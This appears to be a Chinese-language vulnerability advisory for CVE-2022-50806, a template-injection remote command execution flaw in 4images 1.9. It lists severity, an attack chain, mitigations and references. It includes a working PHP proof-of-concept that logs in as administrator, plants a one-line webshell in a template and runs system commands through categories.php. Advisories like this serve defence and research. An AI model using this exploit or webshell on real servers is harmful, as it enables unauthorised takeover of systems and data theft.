CVE-2022-50806 | 4images 1.9 模板注入导致远程命令执行漏洞

漏洞信息

漏洞编号

CVE-2022-50806

漏洞类型

远程代码执行（RCE）

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

4images 1.9

漏洞概述

CVE-2022-50806是4images 1.9版本中的一个高危安全漏洞，CVSS评分达到7.2分。该漏洞属于远程代码执行（RCE）类型，允许经过身份验证的管理员通过模板编辑功能注入恶意代码，从而实现远程命令执行。4images是一款流行的开源图片画廊和相册管理Web应用程序，广泛应用于个人网站和企业内部图片管理系统。由于该漏洞需要管理员权限才能利用，攻击者通常需要先通过其他方式获取管理员凭证，或者利用社会工程学手段诱导管理员访问恶意链接。一旦攻击成功，攻击者可以在服务器上执行任意系统命令，完全控制目标服务器，可能导致数据泄露、服务中断或进一步的内网渗透。该漏洞的存在表明应用程序在模板渲染过程中缺乏足够的输入验证和代码安全隔离机制。

技术细节

该漏洞的根本原因在于4images的模板引擎在处理用户输入时未能进行充分的安全过滤。攻击者作为认证管理员登录系统后，可访问模板编辑功能（通常位于管理后台的模板管理页面）。在编辑模板文件时，攻击者可以将恶意PHP代码或系统命令注入到模板中。模板文件在后续被程序加载和解析时，这些恶意代码会被当作有效的PHP代码执行。具体的利用路径是通过访问categories.php端点，并配合精心构造的cat_id参数来触发被植入恶意代码的模板。当服务器解析该请求时，注入的代码会以Web服务器进程的用户权限（通常是www-data或nobody）执行，从而实现远程命令执行。攻击者通常会注入反向shell代码，建立从目标服务器到攻击者控制服务器的连接，或者直接执行系统命令如读取/etc/passwd、反弹shell等操作。由于模板文件通常以.php或.html形式存储在服务器可访问的目录中，攻击者可以利用文件包含或直接访问来触发代码执行。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用4images 1.9版本，确认管理后台入口位置

STEP 2

凭证获取

通过暴力破解、钓鱼攻击或利用其他漏洞获取管理员账户凭证

STEP 3

模板编辑

以管理员身份登录系统，访问模板编辑功能，注入恶意PHP代码如webshell

STEP 4

触发执行

构造包含cat_id参数的categories.php请求，触发被植入恶意代码的模板解析

STEP 5

命令执行

通过URL参数传递系统命令，服务器执行后返回结果，攻击者获得服务器控制权

STEP 6

后渗透

建立持久化连接，横向移动到内网其他系统，窃取数据或部署后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// CVE-2022-50806 PoC - 4images 1.9 Remote Command Execution
// Requirements: Valid administrator credentials

$target = 'http://target.com/4images/'; // Target URL
$admin_path = 'admin/templates.php'; // Admin template management
$username = 'admin';
$password = 'admin123';

// Step 1: Login as administrator
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target . 'login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "action=login&username=" . urlencode($username) . "&password=" . urlencode($password));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_exec($ch);

// Step 2: Inject malicious code via template editor
$malicious_code = '<?php system($_GET["cmd"]); ?>'; // Simple webshell
$template_data = array(
    'action' => 'savetemplate',
    'template_name' => 'categories.html',
    'template_content' => $malicious_code
);
curl_setopt($ch, CURLOPT_URL, $target . $admin_path);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($template_data));
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_exec($ch);

// Step 3: Execute commands via crafted cat_id parameter
$cmd = 'whoami'; // Command to execute
curl_setopt($ch, CURLOPT_URL, $target . 'categories.php?cat_id=1&cmd=' . urlencode($cmd));
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
$output = curl_exec($ch);
echo "Command output: " . $output;

curl_close($ch);
?>

影响范围

4images 1.9 及之前版本

防御指南

临时缓解措施

立即限制管理后台的访问权限，仅允许可信IP地址访问；对模板文件实施完整性监控，发现未授权修改时立即告警；临时关闭模板在线编辑功能，改为通过FTP或SSH等安全方式管理模板文件；加强管理员账户安全，使用强密码并启用双因素认证；在Web应用层部署输入过滤和输出编码机制，防止恶意代码注入；监控服务器日志，关注异常的categories.php访问请求和命令执行行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2022-50806
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2022-50806
3 Details https://www.cvedetails.com/cve/CVE-2022-50806/
4 VulDB https://vuldb.com/cve/CVE-2022-50806
5 Link https://www.4homepages.de/
6 Link https://www.exploit-db.com/exploits/51147
7 Link https://www.vulncheck.com/advisories/images-remote-command-execution-rce